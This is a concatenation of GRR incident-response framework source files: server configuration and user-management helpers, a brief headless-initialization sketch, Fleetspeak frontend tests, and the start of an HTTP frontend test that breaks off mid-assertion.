"""Guides the user through configuration of various URLs used by GRR."""
print("\n\n-=GRR URLs=-\n"
"For GRR to work each client has to be able to communicate with the\n"
"server. To do this we normally need a public dns name or IP address\n"
"to communicate with. In the standard configuration this will be used\n"
"to host both the client facing server and the admin user interface.\n")
existing_ui_urn = grr_config.CONFIG.Get("AdminUI.url", default=None)
existing_frontend_urns = grr_config.CONFIG.Get("Client.server_urls")
if not existing_frontend_urns:
# Port from older deprecated setting Client.control_urls.
existing_control_urns = grr_config.CONFIG.Get(
"Client.control_urls", default=None)
if existing_control_urns is not None:
existing_frontend_urns = []
for existing_control_urn in existing_control_urns:
if not existing_control_urn.endswith("control"):
raise RuntimeError(
"Invalid existing control URL: %s" % existing_control_urn)
existing_frontend_urns.append(
existing_control_urn.rsplit("/", 1)[0] + "/")
config.Set("Client.server_urls", existing_frontend_urns)
config.Set("Client.control_urls", ["deprecated use Client.server_urls"])
if not existing_frontend_urns or not existing_ui_urn:
ConfigureHostnames(config, external_hostname=external_hostname)
else:
print("Found existing settings:\n AdminUI URL: %s\n "
"Frontend URL(s): %s\n" % (existing_ui_urn, existing_frontend_urns))
if not RetryBoolQuestion("Do you want to keep this configuration?", True):
ConfigureHostnames(config, external_hostname=external_hostname)
def ConfigureEmails(config):
"""Guides the user through email setup."""
print("\n\n-=GRR Emails=-\n"
"GRR needs to be able to send emails for various logging and\n"
"alerting functions. The email domain will be appended to GRR\n"
"usernames when sending emails to users.\n")
existing_log_domain = grr_config.CONFIG.Get("Logging.domain", default=None)
existing_al_email = grr_config.CONFIG.Get(
"Monitoring.alert_email", default=None)
existing_em_email = grr_config.CONFIG.Get(
"Monitoring.emergency_access_email", default=None)
if existing_log_domain and existing_al_email and existing_em_email:
print("Found existing settings:\n"
" Email Domain: %s\n Alert Email Address: %s\n"
" Emergency Access Email Address: %s\n" %
(existing_log_domain, existing_al_email, existing_em_email))
if RetryBoolQuestion("Do you want to keep this configuration?", True):
return
print("\n\n-=Monitoring/Email Domain=-\n"
"Emails concerning alerts or updates must be sent to this domain.\n")
domain = RetryQuestion("Email Domain e.g example.com",
"^([\\.A-Za-z0-9-]+)*$",
grr_config.CONFIG.Get("Logging.domain"))
config.Set("Logging.domain", domain)
print("\n\n-=Alert Email Address=-\n"
"Address where monitoring events get sent, e.g. crashed clients, \n"
"broken server, etc.\n")
email = RetryQuestion("Alert Email Address", "", "grr-monitoring@%s" % domain)
config.Set("Monitoring.alert_email", email)
print("\n\n-=Emergency Email Address=-\n"
"Address where high priority events such as an emergency ACL bypass "
"are sent.\n")
emergency_email = RetryQuestion("Emergency Access Email Address", "",
"grr-emergency@%s" % domain)
config.Set("Monitoring.emergency_access_email", emergency_email)
def InstallTemplatePackage():
"""Call pip to install the templates."""
virtualenv_bin = os.path.dirname(sys.executable)
extension = os.path.splitext(sys.executable)[1]
pip = "%s/pip%s" % (virtualenv_bin, extension)
# Install the GRR server component to satisfy the dependency below.
major_minor_version = ".".join(
pkg_resources.get_distribution("grr-response-core").version.split(".")
[0:2])
# Note that this version spec requires a recent version of pip
subprocess.check_call([
sys.executable, pip, "install", "--upgrade", "-f",
"https://storage.googleapis.com/releases.grr-response.com/index.html",
"grr-response-templates==%s.*" % major_minor_version
])
def FinalizeConfigInit(config,
token,
admin_password = None,
redownload_templates = False,
repack_templates = True,
prompt = True):
"""Performs the final steps of config initialization."""
config.Set("Server.initialized", True)
print("\nWriting configuration to %s." % config["Config.writeback"])
config.Write()
print("Initializing the datastore.")
# Reload the config and initialize the GRR database.
server_startup.Init()
print("\nStep 3: Adding GRR Admin User")
try:
CreateUser("admin", password=<PASSWORD>, is_admin=True)
except UserAlreadyExistsError:
if prompt:
# pytype: disable=wrong-arg-count
if ((builtins.input("User 'admin' already exists, do you want to "
"reset the password? [yN]: ").upper() or "N") == "Y"):
UpdateUser("admin", password=<PASSWORD>, is_admin=True)
# pytype: enable=wrong-arg-count
else:
UpdateUser("admin", password=<PASSWORD>, is_admin=True)
print("\nStep 4: Repackaging clients with new configuration.")
if prompt:
redownload_templates = RetryBoolQuestion(
"Server debs include client templates. Re-download templates?", False)
repack_templates = RetryBoolQuestion("Repack client templates?", True)
if redownload_templates:
InstallTemplatePackage()
# Build debug binaries, then build release binaries.
if repack_templates:
repacking.TemplateRepacker().RepackAllTemplates(upload=True, token=token)
print("\nGRR Initialization complete! You can edit the new configuration "
"in %s.\n" % config["Config.writeback"])
print("Please restart the service for the new configuration to take "
"effect.\n")
def Initialize(config=None,
external_hostname = None,
admin_password = None,
redownload_templates = False,
repack_templates = True,
token = None):
"""Initialize or update a GRR configuration."""
print("Checking write access on config %s" % config["Config.writeback"])
if not os.access(config.parser.filename, os.W_OK):
raise IOError("Config not writeable (need sudo?)")
print("\nStep 0: Importing Configuration from previous installation.")
options_imported = 0
prev_config_file = config.Get("ConfigUpdater.old_config", default=None)
if prev_config_file and os.access(prev_config_file, os.R_OK):
print("Found config file %s." % prev_config_file)
# pytype: disable=wrong-arg-count
if builtins.input("Do you want to import this configuration? "
"[yN]: ").upper() == "Y":
options_imported = ImportConfig(prev_config_file, config)
# pytype: enable=wrong-arg-count
else:
print("No old config file found.")
print("\nStep 1: Setting Basic Configuration Parameters")
print("We are now going to configure the server using a bunch of questions.")
ConfigureDatastore(config)
ConfigureUrls(config, external_hostname=external_hostname)
ConfigureEmails(config)
print("\nStep 2: Key Generation")
if config.Get("PrivateKeys.server_key", default=None):
if options_imported > 0:
print("Since you have imported keys from another installation in the "
"last step,\nyou probably do not want to generate new keys now.")
# pytype: disable=wrong-arg-count
if (builtins.input("You already have keys in your config, do you want to"
" overwrite them? [yN]: ").upper() or "N") == "Y":
config_updater_keys_util.GenerateKeys(config, overwrite_keys=True)
# pytype: enable=wrong-arg-count
else:
config_updater_keys_util.GenerateKeys(config)
FinalizeConfigInit(
config,
token,
admin_password=<PASSWORD>,
redownload_templates=redownload_templates,
repack_templates=repack_templates,
prompt=True)
def InitializeNoPrompt(config=None,
external_hostname = None,
admin_password = <PASSWORD>,
mysql_hostname = None,
mysql_port = None,
mysql_username = None,
mysql_password = <PASSWORD>,
mysql_db = None,
mysql_client_key_path = None,
mysql_client_cert_path = None,
mysql_ca_cert_path = None,
redownload_templates = False,
repack_templates = True,
token = None):
"""Initialize GRR with no prompts.
Args:
config: config object
external_hostname: A hostname.
admin_password: <PASSWORD> the <PASSWORD>.
mysql_hostname: A hostname used for establishing connection to MySQL.
mysql_port: A port used for establishing connection to MySQL.
mysql_username: A username used for establishing connection to MySQL.
mysql_password: <PASSWORD>.
mysql_db: Name of the MySQL database to use.
mysql_client_key_path: The path name of the client private key file.
mysql_client_cert_path: The path name of the client public key certificate.
mysql_ca_cert_path: The path name of the CA certificate file.
redownload_templates: Indicates whether templates should be re-downloaded.
repack_templates: Indicates whether templates should be re-packed.
token: auth token
Raises:
ValueError: if required flags are not provided, or if the config has
already been initialized.
IOError: if config is not writeable
ConfigInitError: if GRR is unable to connect to a running MySQL instance.
This method does the minimum work necessary to configure GRR without any user
prompting, relying heavily on config default values. User must supply the
external hostname, admin password, and MySQL password; everything else is set
automatically.
"""
if config["Server.initialized"]:
raise ValueError("Config has already been initialized.")
if not external_hostname:
raise ValueError(
"--noprompt set, but --external_hostname was not provided.")
if not admin_password:
raise ValueError("--noprompt set, but --admin_password was not provided.")
if mysql_password is None:
raise ValueError("--noprompt set, but --mysql_password was not provided.")
print("Checking write access on config %s" % config.parser)
if not os.access(config.parser.filename, os.W_OK):
raise IOError("Config not writeable (need sudo?)")
config_dict = {}
config_dict["Datastore.implementation"] = "MySQLAdvancedDataStore"
config_dict["Mysql.host"] = mysql_hostname or config["Mysql.host"]
config_dict["Mysql.port"] = mysql_port or config["Mysql.port"]
config_dict["Mysql.database_name"] = mysql_db or config["Mysql.database_name"]
config_dict["Mysql.database_username"] = (
mysql_username or config["Mysql.database_username"])
config_dict["Client.server_urls"] = [
"http://%s:%s/" % (external_hostname, config["Frontend.bind_port"])
]
config_dict["AdminUI.url"] = "http://%s:%s" % (external_hostname,
config["AdminUI.port"])
config_dict["Logging.domain"] = external_hostname
config_dict["Monitoring.alert_email"] = (
"grr-monitoring@%s" % external_hostname)
config_dict["Monitoring.emergency_access_email"] = (
"grr-emergency@%s" % external_hostname)
# Print all configuration options, except for the MySQL password.
print("Setting configuration as:\n\n%s" % config_dict)
config_dict["Mysql.database_password"] = mysql_password
if mysql_client_key_path is not None:
config_dict["Mysql.client_key_path"] = mysql_client_key_path
config_dict["Mysql.client_cert_path"] = mysql_client_cert_path
config_dict["Mysql.ca_cert_path"] = mysql_ca_cert_path
if CheckMySQLConnection(config_dict):
print("Successfully connected to MySQL with the given configuration.")
else:
print("Error: Could not connect to MySQL with the given configuration.")
raise ConfigInitError()
for key, value in iteritems(config_dict):
config.Set(key, value)
config_updater_keys_util.GenerateKeys(config)
FinalizeConfigInit(
config,
token,
admin_password=<PASSWORD>,
redownload_templates=redownload_templates,
repack_templates=repack_templates,
prompt=False)
def GetToken():
# Extend for user authorization
# SetUID is required to create and write to various aff4 paths when updating
# config.
return access_control.ACLToken(username="GRRConsole").SetUID()
def UploadSignedBinary(source_path,
binary_type,
platform,
upload_subdirectory="",
token=None):
"""Signs a binary and uploads it to the datastore.
Args:
source_path: Path to the binary to upload.
binary_type: Type of the binary, e.g. python-hack or executable.
platform: Client platform where the binary is intended to be run.
upload_subdirectory: Path of a subdirectory to upload the binary to,
relative to the canonical path for binaries of the given type and
platform.
token: ACL token to use for uploading.
Raises:
BinaryTooLargeError: If the binary to upload is too large.
"""
if binary_type == rdf_objects.SignedBinaryID.BinaryType.PYTHON_HACK:
root_urn = signed_binary_utils.GetAFF4PythonHackRoot()
elif binary_type == rdf_objects.SignedBinaryID.BinaryType.EXECUTABLE:
root_urn = signed_binary_utils.GetAFF4ExecutablesRoot()
else:
raise ValueError("Unknown binary type %s." % binary_type)
file_size = os.path.getsize(source_path)
if file_size > _MAX_SIGNED_BINARY_BYTES:
raise BinaryTooLargeError(
"File [%s] is of size %d (bytes), which exceeds the allowed maximum "
"of %d bytes." % (source_path, file_size, _MAX_SIGNED_BINARY_BYTES))
binary_urn = root_urn.Add(platform.lower()).Add(upload_subdirectory).Add(
os.path.basename(source_path))
context = ["Platform:%s" % platform.title(), "Client Context"]
with open(source_path, "rb") as f:
file_content = f.read()
maintenance_utils.UploadSignedConfigBlob(
file_content, aff4_path=binary_urn, client_context=context, token=token)
print("Uploaded to %s" % binary_urn)
def CreateUser(username, password=<PASSWORD>, is_admin=False):
"""Creates a new GRR user."""
grr_api = _CreateInProcessRootGRRAPI()
try:
user_exists = grr_api.GrrUser(username).Get() is not None
except api_errors.ResourceNotFoundError:
user_exists = False
if user_exists:
raise UserAlreadyExistsError("User '%s' already exists." % username)
user_type, password = _GetUserTypeAndPassword(
username, password=password, is_admin=is_admin)
grr_api.CreateGrrUser(
username=username, user_type=user_type, password=password)
def UpdateUser(username, password=<PASSWORD>, is_admin=False):
"""Updates the password or privilege-level for a user."""
user_type, password = _GetUserTypeAndPassword(
username, password=password, is_admin=is_admin)
grr_api = _CreateInProcessRootGRRAPI()
grr_user = grr_api.GrrUser(username).Get()
grr_user.Modify(user_type=user_type, password=password)
def GetUserSummary(username):
"""Returns a string with summary info for a user."""
grr_api = _CreateInProcessRootGRRAPI()
try:
return _Summarize(grr_api.GrrUser(username).Get().data)
except api_errors.ResourceNotFoundError:
raise UserNotFoundError(username)
def GetAllUserSummaries():
"""Returns a string containing summary info for all GRR users."""
grr_api = _CreateInProcessRootGRRAPI()
user_wrappers = sorted(grr_api.ListGrrUsers(), key=lambda x: x.username)
summaries = [_Summarize(w.data) for w in user_wrappers]
return "\n\n".join(summaries)
def _Summarize(user_info):
"""Returns a string with summary info for a user."""
return "Username: %s\nIs Admin: %s" % (
user_info.username,
user_info.user_type == api_user.ApiGrrUser.UserType.USER_TYPE_ADMIN)
def DeleteUser(username):
"""Deletes a GRR user from the datastore."""
grr_api = _CreateInProcessRootGRRAPI()
try:
grr_api.GrrUser(username).Get().Delete()
except api_errors.ResourceNotFoundError:
raise UserNotFoundError(username)
def _CreateInProcessRootGRRAPI():
return api.GrrApi(
connector=api_shell_raw_access_lib.RawConnector(
token=GetToken(), page_size=_GRR_API_PAGE_SIZE)).root
def _GetUserTypeAndPassword(username, password=<PASSWORD>, is_admin=False):
"""Returns the user-type and password for a user.
Args:
username: Username for the user.
password: <PASSWORD>. If None, or not provided, we will prompt
for one via the terminal.
is_admin: Indicates whether the user should have admin privileges.
"""
if is_admin:
user_type = api_user.ApiGrrUser.UserType.USER_TYPE_ADMIN
else:
user_type = api_user.ApiGrrUser.UserType.USER_TYPE_STANDARD
if password is None:
# TODO
# pytype: disable=wrong-arg-types
password = getpass.getpass(
prompt="Please enter password for user '%s':" % username)
# pytype: enable=wrong-arg-types
return user_type, password
```
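The initialization helpers above can also be driven without the interactive questionnaire. The sketch below is illustrative only: it assumes the server configuration has already been loaded into `grr_config.CONFIG` (as the interactive flow does) and uses placeholder hostnames and credentials, so treat it as a rough outline of the no-prompt path rather than the canonical admin tool invocation.
```python
# Hedged sketch: headless initialization using the functions defined above.
# grr_config.CONFIG is assumed to hold the loaded server configuration; the
# literal hostnames and passwords below are placeholders, not recommendations.
from grr_response_core import config as grr_config


def InitializeHeadless():
  InitializeNoPrompt(
      config=grr_config.CONFIG,
      external_hostname="grr.example.com",
      admin_password="change-me",
      mysql_hostname="localhost",
      mysql_username="grr",
      mysql_password="db-secret",
      token=GetToken())
```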
#### File: grr_response_server/bin/fleetspeak_frontend_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import itertools
from builtins import range # pylint: disable=redefined-builtin
import mock
from fleetspeak.src.common.proto.fleetspeak import common_pb2 as fs_common_pb2
from fleetspeak.src.server.grpcservice.client import client as fs_client
from fleetspeak.src.server.proto.fleetspeak_server import admin_pb2 as fs_admin_pb2
from grr_response_core.lib import communicator
from grr_response_core.lib import flags
from grr_response_core.lib import rdfvalue
from grr_response_core.lib.rdfvalues import client as rdf_client
from grr_response_core.lib.rdfvalues import flows as rdf_flows
from grr_response_proto import jobs_pb2
from grr_response_server import aff4
from grr_response_server import data_store
from grr_response_server import events
from grr_response_server import fleetspeak_connector
from grr_response_server import fleetspeak_utils
from grr_response_server import queue_manager
from grr_response_server.bin import fleetspeak_frontend as fs_frontend_tool
from grr_response_server.flows.general import processes as flow_processes
from grr_response_server.rdfvalues import flow_objects as rdf_flow_objects
from grr.test_lib import action_mocks
from grr.test_lib import db_test_lib
from grr.test_lib import fleetspeak_test_lib
from grr.test_lib import flow_test_lib
from grr.test_lib import frontend_test_lib
from grr.test_lib import test_lib
FS_SERVICE_NAME = "GRR"
class _FakeGRPCServiceClient(fs_client.ServiceClient):
class _FakeConnection(object):
def __init__(self, send_callback=lambda _: None):
self._send_callback = send_callback
def InsertMessage(self, message, timeout=None):
del timeout
self._send_callback(message)
def ListClients(self, request):
clients = []
for client_id in request.client_ids:
clients.append(
fs_admin_pb2.Client(
client_id=client_id,
labels=[
fs_common_pb2.Label(
service_name="client", label="alphabet"),
fs_common_pb2.Label(
service_name="client", label="alphabet-google-corp"),
fs_common_pb2.Label(service_name="client", label="linux"),
]))
return fs_admin_pb2.ListClientsResponse(clients=clients)
def __init__(self, service_name, send_callback=lambda _: None):
super(_FakeGRPCServiceClient, self).__init__(service_name)
self._process = None
self._send_callback = send_callback
self.outgoing = self._FakeConnection(send_callback)
def Listen(self, process):
self._process = process
def Send(self, message):
self._send_callback(message)
def MockIncomingFSMessage(self, message):
self._process(message)
def MockIncomingFSMessages(self, messages):
for message in messages:
self.MockIncomingFSMessage(message)
def SetAFF4FSEnabledFlag(grr_id, token):
with aff4.FACTORY.Create(
grr_id, aff4.AFF4Object.classes["VFSGRRClient"], mode="w",
token=token) as client:
client.Set(client.Schema.FLEETSPEAK_ENABLED, rdfvalue.RDFBool(True))
@db_test_lib.DualDBTest
class FleetspeakGRRFEServerTest(frontend_test_lib.FrontEndServerTest):
"""Tests the Fleetspeak based GRRFEServer."""
def setUp(self):
super(FleetspeakGRRFEServerTest, self).setUp()
fake_conn = _FakeGRPCServiceClient(FS_SERVICE_NAME)
self._conn_overrider = fleetspeak_test_lib.ConnectionOverrider(fake_conn)
self._conn_overrider.Start()
def tearDown(self):
super(FleetspeakGRRFEServerTest, self).tearDown()
self._conn_overrider.Stop()
@db_test_lib.LegacyDataStoreOnly
def testReceiveMessages_Legacy(self):
fsd = fs_frontend_tool.GRRFSServer()
grr_client_nr = 0xab
grr_client_id_urn = self.SetupClient(grr_client_nr)
flow_obj = self.FlowSetup(flow_test_lib.FlowOrderTest.__name__,
grr_client_id_urn)
num_msgs = 9
session_id = flow_obj.session_id
messages = [
rdf_flows.GrrMessage(
request_id=1,
response_id=i,
session_id=session_id,
payload=rdfvalue.RDFInteger(i)) for i in range(1, num_msgs + 1)
]
fs_client_id = b"\x10\x00\x00\x00\x00\x00\x00\xab"
# fs_client_id should be equivalent to grr_client_id_urn
self.assertEqual(
fs_client_id,
fleetspeak_utils.GRRIDToFleetspeakID(grr_client_id_urn.Basename()))
fs_messages = [
fs_common_pb2.Message(
message_type="GrrMessage",
source=fs_common_pb2.Address(
client_id=fs_client_id, service_name=FS_SERVICE_NAME))
for _ in range(num_msgs)
]
for fs_message, message in itertools.izip(fs_messages, messages):
fs_message.data.Pack(message.AsPrimitiveProto())
for msg in fs_messages:
fsd.Process(msg, None)
# Make sure the task is still on the client queue
manager = queue_manager.QueueManager(token=self.token)
tasks_on_client_queue = manager.Query(grr_client_id_urn, 100)
self.assertLen(tasks_on_client_queue, 1)
want_messages = [message.Copy() for message in messages]
for want_message in want_messages:
# This is filled in by the frontend as soon as it gets the message.
want_message.auth_state = (
rdf_flows.GrrMessage.AuthorizationState.AUTHENTICATED)
want_message.source = grr_client_id_urn
stored_messages = data_store.DB.ReadResponsesForRequestId(session_id, 1)
self.assertLen(stored_messages, len(want_messages))
stored_messages.sort(key=lambda m: m.response_id)
# Check that messages were stored correctly
for stored_message, want_message in itertools.izip(stored_messages,
want_messages):
stored_message.timestamp = None
self.assertRDFValuesEqual(stored_message, want_message)
def testReceiveMessages_Relational(self):
if not data_store.RelationalDBFlowsEnabled():
self.skipTest("Rel-db-only test.")
fs_server = fs_frontend_tool.GRRFSServer()
client_id = "C.1234567890123456"
flow_id = "12345678"
data_store.REL_DB.WriteClientMetadata(client_id, fleetspeak_enabled=True)
rdf_flow = rdf_flow_objects.Flow(
client_id=client_id,
flow_id=flow_id,
create_time=rdfvalue.RDFDatetime.Now())
data_store.REL_DB.WriteFlowObject(rdf_flow)
flow_request = rdf_flow_objects.FlowRequest(
client_id=client_id, flow_id=flow_id, request_id=1)
data_store.REL_DB.WriteFlowRequests([flow_request])
session_id = "%s/%s" % (client_id, flow_id)
fs_client_id = fleetspeak_utils.GRRIDToFleetspeakID(client_id)
fs_messages = []
for i in range(1, 10):
grr_message = rdf_flows.GrrMessage(
request_id=1,
response_id=i + 1,
session_id=session_id,
payload=rdfvalue.RDFInteger(i))
fs_message = fs_common_pb2.Message(
message_type="GrrMessage",
source=fs_common_pb2.Address(
client_id=fs_client_id, service_name=FS_SERVICE_NAME))
fs_message.data.Pack(grr_message.AsPrimitiveProto())
fs_messages.append(fs_message)
with test_lib.FakeTime(rdfvalue.RDFDatetime.FromSecondsSinceEpoch(123)):
for fs_message in fs_messages:
fs_server.Process(fs_message, None)
# Ensure the last-ping timestamp gets updated.
client_data = data_store.REL_DB.MultiReadClientMetadata([client_id])
self.assertEqual(client_data[client_id].ping,
rdfvalue.RDFDatetime.FromSecondsSinceEpoch(123))
flow_data = data_store.REL_DB.ReadAllFlowRequestsAndResponses(
client_id, flow_id)
self.assertLen(flow_data, 1)
stored_flow_request, flow_responses = flow_data[0]
self.assertEqual(stored_flow_request, flow_request)
self.assertLen(flow_responses, 9)
@db_test_lib.LegacyDataStoreOnly
def testReceiveMessageList(self):
fsd = fs_frontend_tool.GRRFSServer()
grr_client_nr = 0xab
grr_client_id_urn = self.SetupClient(grr_client_nr)
flow_obj = self.FlowSetup(flow_test_lib.FlowOrderTest.__name__,
grr_client_id_urn)
num_msgs = 9
session_id = flow_obj.session_id
messages = [
rdf_flows.GrrMessage(
request_id=1,
response_id=i,
session_id=session_id,
payload=rdfvalue.RDFInteger(i)) for i in range(1, num_msgs + 1)
]
fs_client_id = b"\x10\x00\x00\x00\x00\x00\x00\xab"
# fs_client_id should be equivalent to grr_client_id_urn
self.assertEqual(
fs_client_id,
fleetspeak_utils.GRRIDToFleetspeakID(grr_client_id_urn.Basename()))
message_list = rdf_flows.PackedMessageList()
communicator.Communicator.EncodeMessageList(
rdf_flows.MessageList(job=messages), message_list)
fs_message = fs_common_pb2.Message(
message_type="MessageList",
source=fs_common_pb2.Address(
client_id=fs_client_id, service_name=FS_SERVICE_NAME))
fs_message.data.Pack(message_list.AsPrimitiveProto())
fsd.Process(fs_message, None)
# Make sure the task is still on the client queue
manager = queue_manager.QueueManager(token=self.token)
tasks_on_client_queue = manager.Query(grr_client_id_urn, 100)
self.assertLen(tasks_on_client_queue, 1)
want_messages = [message.Copy() for message in messages]
for want_message in want_messages:
# This is filled in by the frontend as soon as it gets the message.
want_message.auth_state = (
rdf_flows.GrrMessage.AuthorizationState.AUTHENTICATED)
want_message.source = grr_client_id_urn
stored_messages = data_store.DB.ReadResponsesForRequestId(session_id, 1)
self.assertLen(stored_messages, len(want_messages))
stored_messages.sort(key=lambda m: m.response_id)
# Check that messages were stored correctly
for stored_message, want_message in itertools.izip(stored_messages,
want_messages):
stored_message.timestamp = None
self.assertRDFValuesEqual(stored_message, want_message)
def testReceiveMessageList_Relational(self):
if not data_store.RelationalDBFlowsEnabled():
self.skipTest("Rel-db-only test.")
fs_server = fs_frontend_tool.GRRFSServer()
client_id = "C.1234567890123456"
flow_id = "12345678"
data_store.REL_DB.WriteClientMetadata(client_id, fleetspeak_enabled=True)
rdf_flow = rdf_flow_objects.Flow(
client_id=client_id,
flow_id=flow_id,
create_time=rdfvalue.RDFDatetime.Now())
data_store.REL_DB.WriteFlowObject(rdf_flow)
flow_request = rdf_flow_objects.FlowRequest(
client_id=client_id, flow_id=flow_id, request_id=1)
data_store.REL_DB.WriteFlowRequests([flow_request])
session_id = "%s/%s" % (client_id, flow_id)
fs_client_id = fleetspeak_utils.GRRIDToFleetspeakID(client_id)
grr_messages = []
for i in range(1, 10):
grr_message = rdf_flows.GrrMessage(
request_id=1,
response_id=i + 1,
session_id=session_id,
payload=rdfvalue.RDFInteger(i))
grr_messages.append(grr_message)
packed_messages = rdf_flows.PackedMessageList()
communicator.Communicator.EncodeMessageList(
rdf_flows.MessageList(job=grr_messages), packed_messages)
fs_message = fs_common_pb2.Message(
message_type="MessageList",
source=fs_common_pb2.Address(
client_id=fs_client_id, service_name=FS_SERVICE_NAME))
fs_message.data.Pack(packed_messages.AsPrimitiveProto())
with test_lib.FakeTime(rdfvalue.RDFDatetime.FromSecondsSinceEpoch(123)):
fs_server.Process(fs_message, None)
# Ensure the last-ping timestamp gets updated.
client_data = data_store.REL_DB.MultiReadClientMetadata([client_id])
self.assertEqual(client_data[client_id].ping,
rdfvalue.RDFDatetime.FromSecondsSinceEpoch(123))
flow_data = data_store.REL_DB.ReadAllFlowRequestsAndResponses(
client_id, flow_id)
self.assertLen(flow_data, 1)
stored_flow_request, flow_responses = flow_data[0]
self.assertEqual(stored_flow_request, flow_request)
self.assertLen(flow_responses, 9)
def testWriteLastPingForNewClients(self):
if not data_store.RelationalDBFlowsEnabled():
self.skipTest("Rel-db-only test.")
fs_server = fs_frontend_tool.GRRFSServer()
client_id = "C.1234567890123456"
flow_id = "12345678"
session_id = "%s/%s" % (client_id, flow_id)
fs_client_id = fleetspeak_utils.GRRIDToFleetspeakID(client_id)
grr_message = rdf_flows.GrrMessage(
request_id=1,
response_id=1,
session_id=session_id,
payload=rdfvalue.RDFInteger(1))
fs_message = fs_common_pb2.Message(
message_type="GrrMessage",
source=fs_common_pb2.Address(
client_id=fs_client_id, service_name=FS_SERVICE_NAME))
fs_message.data.Pack(grr_message.AsPrimitiveProto())
fake_time = rdfvalue.RDFDatetime.FromSecondsSinceEpoch(123)
with mock.patch.object(
events.Events, "PublishEvent",
wraps=events.Events.PublishEvent) as publish_event_fn:
with mock.patch.object(
data_store.REL_DB,
"WriteClientMetadata",
wraps=data_store.REL_DB.WriteClientMetadata) as write_metadata_fn:
with test_lib.FakeTime(fake_time):
fs_server.Process(fs_message, None)
self.assertEqual(write_metadata_fn.call_count, 1)
client_data = data_store.REL_DB.MultiReadClientMetadata([client_id])
self.assertEqual(client_data[client_id].ping, fake_time)
# TODO(user): publish_event_fn.assert_any_call(
# "ClientEnrollment", mock.ANY, token=mock.ANY) doesn't work here
# for some reason.
triggered_events = []
for call_args, _ in publish_event_fn.call_args_list:
if call_args:
triggered_events.append(call_args[0])
self.assertIn("ClientEnrollment", triggered_events)
@db_test_lib.DualDBTest
class ListProcessesFleetspeakTest(flow_test_lib.FlowTestsBaseclass):
"""Test the process listing flow w/ Fleetspeak."""
def setUp(self):
super(ListProcessesFleetspeakTest, self).setUp()
self.client_id = self.SetupClient(0)
SetAFF4FSEnabledFlag(self.client_id, token=self.token)
data_store.REL_DB.WriteClientMetadata(
self.client_id.Basename(), fleetspeak_enabled=True)
def testProcessListingOnlyFleetspeak(self):
"""Test that the ListProcesses flow works with Fleetspeak."""
client_mock = action_mocks.ListProcessesMock([
rdf_client.Process(
pid=2,
ppid=1,
cmdline=["cmd.exe"],
exe=r"c:\windows\cmd.exe",
ctime=1333718907167083)
])
client_mock.mock_task_queue = []
def SendCallback(fs_msg):
pb_msg = jobs_pb2.GrrMessage()
fs_msg.data.Unpack(pb_msg)
msg = rdf_flows.GrrMessage.FromSerializedString(
pb_msg.SerializeToString())
client_mock.mock_task_queue.append(msg)
fake_conn = _FakeGRPCServiceClient(
FS_SERVICE_NAME, send_callback=SendCallback)
with fleetspeak_test_lib.ConnectionOverrider(fake_conn):
with mock.patch.object(
fake_conn.outgoing,
"InsertMessage",
wraps=fake_conn.outgoing.InsertMessage):
session_id = flow_test_lib.TestFlowHelper(
flow_processes.ListProcesses.__name__,
client_mock,
client_id=self.client_id,
token=self.token)
fleetspeak_connector.CONN.outgoing.InsertMessage.assert_called()
# Check the output collection
processes = flow_test_lib.GetFlowResults(self.client_id, session_id)
self.assertLen(processes, 1)
process, = processes
self.assertEqual(process.ctime, 1333718907167083)
self.assertEqual(process.cmdline, ["cmd.exe"])
def main(args):
test_lib.main(args)
if __name__ == "__main__":
flags.StartMain(main)
```
#### File: grr_response_server/bin/frontend_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import hashlib
import os
import socket
import threading
import time
from future.builtins import range
from future.utils import iteritems
import ipaddr
import portpicker
import requests
from grr_response_core.lib import flags
from grr_response_core.lib import utils
from grr_response_core.lib.rdfvalues import file_finder as rdf_file_finder
from grr_response_core.lib.rdfvalues import paths as rdf_paths
from grr_response_server import aff4
from grr_response_server import data_store
from grr_response_server import data_store_utils
from grr_response_server import db
from grr_response_server import file_store
from grr_response_server.aff4_objects import aff4_grr
from grr_response_server.aff4_objects import filestore
from grr_response_server.bin import frontend
from grr_response_server.flows.general import file_finder
from grr.test_lib import action_mocks
from grr.test_lib import db_test_lib
from grr.test_lib import flow_test_lib
from grr.test_lib import test_lib
from grr.test_lib import worker_mocks
@db_test_lib.DualDBTest
class GRRHTTPServerTest(test_lib.GRRBaseTest):
"""Test the http server."""
@classmethod
def setUpClass(cls):
super(GRRHTTPServerTest, cls).setUpClass()
# Bring up a local server for testing.
port = portpicker.pick_unused_port()
ip = utils.ResolveHostnameToIP("localhost", port)
cls.httpd = frontend.GRRHTTPServer((ip, port),
frontend.GRRHTTPServerHandler)
if ipaddr.IPAddress(ip).version == 6:
cls.address_family = socket.AF_INET6
cls.base_url = "http://[%s]:%d/" % (ip, port)
else:
cls.address_family = socket.AF_INET
cls.base_url = "http://%s:%d/" % (ip, port)
cls.httpd_thread = threading.Thread(
name="GRRHTTPServerTestThread", target=cls.httpd.serve_forever)
cls.httpd_thread.daemon = True
cls.httpd_thread.start()
@classmethod
def tearDownClass(cls):
cls.httpd.Shutdown()
cls.httpd_thread.join()
def setUp(self):
super(GRRHTTPServerTest, self).setUp()
self.client_id = self.SetupClient(0)
def tearDown(self):
super(GRRHTTPServerTest, self).tearDown()
# Wait until all pending http requests have been handled.
for _ in range(100):
if frontend.GRRHTTPServerHandler.active_counter == 0:
return
time.sleep(0.01)
self.fail("HTTP server thread did not shut down in time.")
def testServerPem(self):
req = requests.get(self.base_url + "server.pem")
self.assertEqual(req.status_code, 200)
self.assertIn("BEGIN CERTIFICATE", req.content)
def _RunClientFileFinder(self,
paths,
action,
network_bytes_limit=None,
client_id=None):
client_id = client_id or self.SetupClient(0)
with test_lib.ConfigOverrider({"Client.server_urls": [self.base_url]}):
session_id = flow_test_lib.TestFlowHelper(
file_finder.ClientFileFinder.__name__,
action_mocks.ClientFileFinderClientMock(
client_worker=worker_mocks.FakeClientWorker()),
client_id=client_id,
paths=paths,
pathtype=rdf_paths.PathSpec.PathType.OS,
action=action,
process_non_regular_files=True,
network_bytes_limit=network_bytes_limit,
token=self.token)
return session_id
def testClientFileFinderUpload(self):
paths = [os.path.join(self.base_path, "{**,.}/*.plist")]
action = rdf_file_finder.FileFinderAction.Download()
session_id = self._RunClientFileFinder(paths, action)
results = flow_test_lib.GetFlowResults(self.client_id, session_id)
self.assertLen(results, 5)
relpaths = [
os.path.relpath(p.stat_entry.pathspec.path, self.base_path)
for p in results
]
self.assertCountEqual(relpaths, [
